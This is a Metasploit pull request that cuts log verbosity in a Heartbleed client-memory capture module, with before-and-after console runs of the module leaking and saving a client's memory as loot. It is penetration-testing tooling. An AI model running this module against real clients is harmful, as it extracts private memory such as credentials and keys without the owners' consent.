### PR TITLE
Make the output less verbose

### DIFF
--- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
+++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
@@ -209,7 +209,7 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     message_code = buff[0,1].to_s.unpack("C").first
-    print_status("#{@state[c][:name]} Message #{sprintf("type %.2x v%.4x %.2x", message_type, message_version, message_code)}")
+    vprint_status("#{@state[c][:name]} Message #{sprintf("type %.2x v%.4x %.2x", message_type, message_version, message_code)}")
 
     if message_type == 0x16
       print_status("#{@state[c][:name]} Processing Client Finished...")
@@ -222,12 +222,13 @@ class Metasploit3 < Msf::Auxiliary
 
     # Process heartbeat replies
     if message_type == 0x18
-      print_status("#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} total]")
+      vprint_status("#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} bytes total]")
       @state[c][:heartbeats] << buff
     end
 
     # Full up on heartbeats, disconnect the client
     if @state[c][:heartbeats].length >= heartbeat_limit
+      print_status("#{@state[c][:name]} Encrypted heartbeats received [#{@state[c][:heartbeats].length} bytes total]")
       store_captured_heartbeats(c)
       c.close()
     end
@@ -238,7 +239,7 @@ class Metasploit3 < Msf::Auxiliary
     if @state[c][:heartbeats].length > 0
       begin
         path = store_loot("openssl_memory_dump", "octet/stream", c.peerhost, @state[c][:heartbeats], "openssl_client_memory_dump.bin", "OpenSSL Heartbeat Client Memory Dump")
-        print_status("#{@state[c][:name]} Heartbeat stored in #{path}")
+        print_status("#{@state[c][:name]} Heartbeat data stored in #{path}")
       rescue ::Interrupt
         raise $!
       rescue ::Exception


### PR DESCRIPTION
```
msf > use auxiliary/server/openssl_heartbeat_client_memory
msf auxiliary(openssl_heartbeat_client_memory) > run

[*] Listening on 0.0.0.0:8443...
[*] Server started.
[*] 10.6.0.198:43586 Connected
[*] 10.6.0.198:43586 Message type 16 v0301 01
[*] 10.6.0.198:43586 Processing Client Hello...
[*] 10.6.0.198:43586 Sending Server Hello and certificate...
[*] 10.6.0.198:43586 Message type 16 v0302 10
[*] 10.6.0.198:43586 Processing Client Key Exchange...
[*] 10.6.0.198:43586 Message type 14 v0302 01
[*] 10.6.0.198:43586 Processing Change Cipher Spec...
[*] 10.6.0.198:43586 Message type 16 v0302 37
[*] 10.6.0.198:43586 Processing Client Finished...
[*] 10.6.0.198:43586 Message type 18 v0302 a5
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [0 total]
[*] 10.6.0.198:43586 Message type 18 v0302 fb
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [16417 total]
[*] 10.6.0.198:43586 Message type 18 v0302 9c
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [16469 total]
[*] 10.6.0.198:43586 Message type 18 v0302 cd
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [32886 total]
[*] 10.6.0.198:43586 Message type 18 v0302 7a
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [32938 total]
[*] 10.6.0.198:43586 Message type 18 v0302 03
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [49355 total]
[*] 10.6.0.198:43586 Message type 18 v0302 1e
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [49407 total]
[*] 10.6.0.198:43586 Message type 18 v0302 a9
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [65824 total]
[*] 10.6.0.198:43586 Message type 18 v0302 d5
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [65876 total]
[*] 10.6.0.198:43586 Message type 18 v0302 57
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [82293 total]
[*] 10.6.0.198:43586 Message type 18 v0302 07
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [82345 total]
[*] 10.6.0.198:43586 Message type 18 v0302 b9
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [98762 total]
[*] 10.6.0.198:43586 Message type 18 v0302 c5
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [98814 total]
[*] 10.6.0.198:43586 Message type 18 v0302 ce
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [115231 total]
[*] 10.6.0.198:43586 Message type 18 v0302 88
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [115283 total]
[*] 10.6.0.198:43586 Message type 18 v0302 1b
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [131700 total]
[*] 10.6.0.198:43586 Message type 18 v0302 c3
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [131752 total]
[*] 10.6.0.198:43586 Message type 18 v0302 ab
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [148169 total]
[*] 10.6.0.198:43586 Message type 18 v0302 4a
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [148221 total]
[*] 10.6.0.198:43586 Message type 18 v0302 da
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [164638 total]
[*] 10.6.0.198:43586 Message type 18 v0302 e4
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [164690 total]
[*] 10.6.0.198:43586 Message type 18 v0302 59
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [181107 total]
[*] 10.6.0.198:43586 Message type 18 v0302 cf
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [181159 total]
[*] 10.6.0.198:43586 Message type 18 v0302 02
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [197576 total]
[*] 10.6.0.198:43586 Message type 18 v0302 7e
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [197628 total]
[*] 10.6.0.198:43586 Message type 18 v0302 e6
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [214045 total]
[*] 10.6.0.198:43586 Message type 18 v0302 39
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [214097 total]
[*] 10.6.0.198:43586 Message type 18 v0302 f9
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [230514 total]
[*] 10.6.0.198:43586 Message type 18 v0302 a8
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [230566 total]
[*] 10.6.0.198:43586 Message type 18 v0302 19
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [246983 total]
[*] 10.6.0.198:43586 Message type 18 v0302 42
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [247035 total]
[*] 10.6.0.198:43586 Message type 18 v0302 65
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [263452 total]
[*] 10.6.0.198:43586 Message type 18 v0302 3d
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [263504 total]
[*] 10.6.0.198:43586 Message type 18 v0302 c1
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [279921 total]
[*] 10.6.0.198:43586 Message type 18 v0302 1e
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [279973 total]
[*] 10.6.0.198:43586 Message type 18 v0302 16
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [296390 total]
[*] 10.6.0.198:43586 Message type 18 v0302 c6
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [296442 total]
[*] 10.6.0.198:43586 Message type 18 v0302 f2
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [312859 total]
[*] 10.6.0.198:43586 Message type 18 v0302 40
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [312911 total]
[*] 10.6.0.198:43586 Message type 18 v0302 65
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [329328 total]
[*] 10.6.0.198:43586 Message type 18 v0302 ed
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [329380 total]
[*] 10.6.0.198:43586 Message type 18 v0302 a6
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [345797 total]
[*] 10.6.0.198:43586 Message type 18 v0302 da
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [345849 total]
[*] 10.6.0.198:43586 Message type 18 v0302 01
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [362266 total]
[*] 10.6.0.198:43586 Message type 18 v0302 e8
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [362318 total]
[*] 10.6.0.198:43586 Message type 18 v0302 8b
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [378735 total]
[*] 10.6.0.198:43586 Message type 18 v0302 e8
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [378787 total]
[*] 10.6.0.198:43586 Message type 18 v0302 c1
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [395204 total]
[*] 10.6.0.198:43586 Message type 18 v0302 bd
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [395256 total]
[*] 10.6.0.198:43586 Message type 18 v0302 84
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [411673 total]
[*] 10.6.0.198:43586 Message type 18 v0302 50
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [411725 total]
[*] 10.6.0.198:43586 Message type 18 v0302 df
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [428142 total]
[*] 10.6.0.198:43586 Message type 18 v0302 08
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [428194 total]
[*] 10.6.0.198:43586 Message type 18 v0302 eb
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [444611 total]
[*] 10.6.0.198:43586 Message type 18 v0302 6a
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [444663 total]
[*] 10.6.0.198:43586 Message type 18 v0302 5c
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [461080 total]
[*] 10.6.0.198:43586 Message type 18 v0302 ec
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [461132 total]
[*] 10.6.0.198:43586 Message type 18 v0302 19
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [477549 total]
[*] 10.6.0.198:43586 Message type 18 v0302 26
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [477601 total]
[*] 10.6.0.198:43586 Message type 18 v0302 86
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [494018 total]
[*] 10.6.0.198:43586 Message type 18 v0302 07
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [494070 total]
[*] 10.6.0.198:43586 Message type 18 v0302 64
[*] 10.6.0.198:43586 Encrypted heartbeat received (52 bytes) [510487 total]
[*] 10.6.0.198:43586 Message type 18 v0302 24
[*] 10.6.0.198:43586 Encrypted heartbeat received (16417 bytes) [510539 total]
[*] 10.6.0.198:43586 Heartbeat stored in /home/wvu/.msf4/loot/20140409150014_default_10.6.0.198_openssl_memory_d_342102.bin
```

vs.

```
msf > use auxiliary/server/openssl_heartbeat_client_memory
msf auxiliary(openssl_heartbeat_client_memory) > run

[*] Listening on 0.0.0.0:8443...
[*] Server started.
[*] 10.6.0.198:43591 Connected
[*] 10.6.0.198:43591 Message type 16 v0301 01
[*] 10.6.0.198:43591 Processing Client Hello...
[*] 10.6.0.198:43591 Sending Server Hello and certificate...
[*] 10.6.0.198:43591 Message type 16 v0302 10
[*] 10.6.0.198:43591 Processing Client Key Exchange...
[*] 10.6.0.198:43591 Message type 14 v0302 01
[*] 10.6.0.198:43591 Processing Change Cipher Spec...
[*] 10.6.0.198:43591 Processing Client Finished...
[*] 10.6.0.198:43591 Encrypted heartbeats received [526956 bytes total]
[*] 10.6.0.198:43591 Heartbeat data stored in /home/wvu/.msf4/loot/20140409150243_default_10.6.0.198_openssl_memory_d_527576.bin
```
